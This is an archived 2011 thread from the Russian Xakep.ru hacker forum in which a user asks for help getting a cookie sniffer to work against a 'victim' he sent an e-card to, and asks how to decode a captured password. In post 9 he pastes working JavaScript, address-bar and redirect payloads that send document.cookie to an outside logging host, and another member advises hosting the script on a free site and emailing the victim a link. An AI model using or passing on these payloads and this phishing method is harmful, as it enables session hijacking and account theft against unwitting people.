Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Вопрос по снифферу

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Первый вопрос] >> Вопрос по снифферу
Имя
Сообщение << Старые топики   Новые топики >>
Вопрос по снифферу - 2011-03-17 04:55:02.973333   
beast_666

Сообщений: 8
Оценки: 0
Присоединился: 2011-03-17 04:41:45
Доброе время суток,посмотрел видео урок от Barkass$&nbsp; по снифферу!
Спасибо ему,урок был полезен!
Но возникла загвоздка,отправил жертве открытку как в видео,но в ответ в логах увидел :
IP: был айпи
Query: empty
REFERER: empty
AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.17) Gecko/20110121 Firefox/3.5.17

А при отправке JavaScript код для адресной строки все было нормально.
С чем это связанно?И через какой онлай расшифровщик можно вытащить полученный пароль?
Заранее благодарю
Post #: 1
RE: Вопрос по снифферу - 2011-03-17 06:01:31.963333   
Ltonid

Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
Эмм, на снифер не приходит паролей обычно. Ты или код снифера укажи или ещё что-то, не все видели уроки.
Post #: 2
RE: Вопрос по снифферу - 2011-03-17 14:05:00.393333   
beast_666

Сообщений: 8
Оценки: 0
Присоединился: 2011-03-17 04:41:45
Это онлайн сниффер
http://hacker-pro.net/sniffer/
Поэтому код я точно не знаю
Post #: 3
RE: Вопрос по снифферу - 2011-03-18 08:39:20.186666   
M045

Сообщений: 49
Оценки: 0
Присоединился: 2011-03-12 08:46:07.520000
выложи видео
Post #: 4
RE: Вопрос по снифферу - 2011-03-18 21:28:50.990000   
beast_666

Сообщений: 8
Оценки: 0
Присоединился: 2011-03-17 04:41:45
http://dump.ru/file/4393761
вот как и просил :)
Post #: 5
RE: Вопрос по снифферу - 2011-03-18 21:30:12.726666   
MicroXaker

Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
Не актуально.
P.S. Лучше сделай сайт на народе и засунь туда яваскрипт. А в письме ссылку на сайт.
Post #: 6
RE: Вопрос по снифферу - 2011-03-19 07:17:34.350000   
beast_666

Сообщений: 8
Оценки: 0
Присоединился: 2011-03-17 04:41:45
quote:

ORIGINAL: MicroXaker

Не актуально.
P.S. Лучше сделай сайт на народе и засунь туда яваскрипт. А в письме ссылку на сайт.

Можно по подробней,по поводу скрипта?
Post #: 7
RE: Вопрос по снифферу - 2011-03-19 16:12:12.333333   
MicroXaker

Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
Выложи сюда коды из "настроек".
Post #: 8
RE: Вопрос по снифферу - 2011-03-20 01:34:53.130000   
beast_666

Сообщений: 8
Оценки: 0
Присоединился: 2011-03-17 04:41:45
[b][color="#ff0000"]jаvаsсriрt код:[/color] &lt;sсriрt&gt; img = new Image(); img.src = "http://httpz.ru/nivwt7vdvls.gif?"+document.cооkie; &lt;/sсriрt&gt; [/b][b][color="#ff0000"]jаvаsсriрt код с редиректом:[/color] &lt;sсriрt&gt; img = new Image(); img.src = "http://httpz.ru/nivwt7vdvls.gif?"+document.cооkie; // редирект через 3 сек.   var URL = "http://images.cards.mail.ru/11bolprivet.jpg"   var speed = 3000;   function reload() {   document.location = URL   }   setTimeout("reload()", speed); &lt;/sсriрt&gt;[/b][b] [/b][color="#cc0000"][b]jаvаsсriрt код для адресной строки:[/b][/color] [b]jаvаsсriрt:document.write('&lt;sсriрt&gt;img = new Image(); img.src = "http://httpz.ru/nivwt7vdvls.gif?"+document.cооkie;&lt;/sсriрt&gt;')[/b] [color="#ff0000"][b]jаvаsсriрt код для адресной строки c редиректом:[/b][/color] j[b]avasсriрt:document.write('&lt;sсriрt&gt;img = new Image(); img.src = "http://httpz.ru/nivwt7vdvls.gif?"+document.cооkie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);&lt;/sсriрt&gt;') [/b] [b][color="#ff0000"]HТМL код:[/color] &lt;img src="http://httpz.ru/nivwt7vdvls.gif"&gt; [color="#ff0000"] [/color][/b][b][color="#ff0000"]bb код: [color="#000000"][img]http://httpz.ru/nivwt7vdvls.gif[/img][/color] [/color][image]http://httpz.ru/nivwt7vdvls.gif[/image] [/b]
Post #: 9
RE: Вопрос по снифферу - 2011-03-20 10:51:54.850000   
MicroXaker

Сообщений: 1772
Оценки: 45
Присоединился: 2010-11-08 16:42:18.190000
Ох как некрасиво получилось, вот Ltonid проказник :)
По-моему тебе нужен JavaScript код, без редиректов, не для адресной строки а обычный JavaScript код. Попробуй сделать сайтик на юкозе или на народе и загони туда этот скрипт, а потом зайди на сайт глазами юзера и посмотри в лог, пришли куки или нет.
Post #: 10
Страниц:  [1]
Все форумы >> [Первый вопрос] >> Вопрос по снифферу







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.